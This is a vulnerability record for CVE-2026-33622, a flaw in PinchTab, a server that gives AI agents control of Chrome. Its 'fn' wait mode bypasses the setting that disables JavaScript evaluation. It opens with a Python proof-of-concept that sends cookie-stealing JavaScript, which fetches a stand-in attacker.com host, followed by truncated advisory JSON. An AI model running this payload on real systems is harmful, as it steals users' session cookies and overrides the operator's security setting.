CVE-2026-33622

import requests # Target configuration url = "http://localhost:port/wait" # Attacker's server token (Required for exploitation) token = "YOUR_SERVER_TOKEN" # Malicious JavaScript to execute # This example sends the document cookies to an external server malicious_js = "fetch('http://attacker.com/exfil?c=' + document.cookie)" # Prepare the payload exploiting the 'fn' mode payload = { "fn": malicious_js, "mode": "fn" } headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Send the malicious request response = requests.post(url, json=payload, headers=headers) print(f"Status: {response.status_code}") print(f"Response: {response.text}")

{"cve": {"id": "CVE-2026-33622", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:06.780", "lastModified": "2026-03-31T16:11:45.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled. `POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy. This is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation. The current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes. As of time of publication, a patched version is not yet available."}, {"lang": "es", "value": "PinchTab es un servidor HTTP independiente que da a los agentes de IA control directo sobre un navegador Chrome. PinchTab 'v0.8.3' a 'v0.8.5' permiten la ejecución arbitraria de JavaScript a través de 'POST /wait' y 'POST /tabs/{id}/wait' cuando la solicitud usa el modo 'fn', incluso si 'security.allowEvaluate' está deshabilitado. 'POST /evaluate' aplica correctamente la protección 'security.allowEvaluate', que está deshabilitada por defecto. Sin embargo, en las versiones afectadas, 'POST /wait' aceptó una expresión 'fn' controlada por el usuario, la incrustó directamente en JavaScript ejecutable y la evaluó en el contexto del navegador sin verificar la misma política. Esto es una omisión de política de seguridad en lugar de una omisión de autenticación separada. La explotación aún requiere acceso autenticado a la API, pero un llamador con el token del servidor puede ejecutar JavaScript arbitrario en un contexto de pestaña incluso cuando el operador deshabilitó explícitamente la evaluación de JavaScript. El 'worktree' actual soluciona esto aplicando el mismo límite de política al modo 'fn' en '/wait' que ya existe en '/evaluate', mientras se preservan los modos de espera que no son de código. A partir del momento de la publicación, una versión parcheada aún no está disponible."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"opera ... (truncated)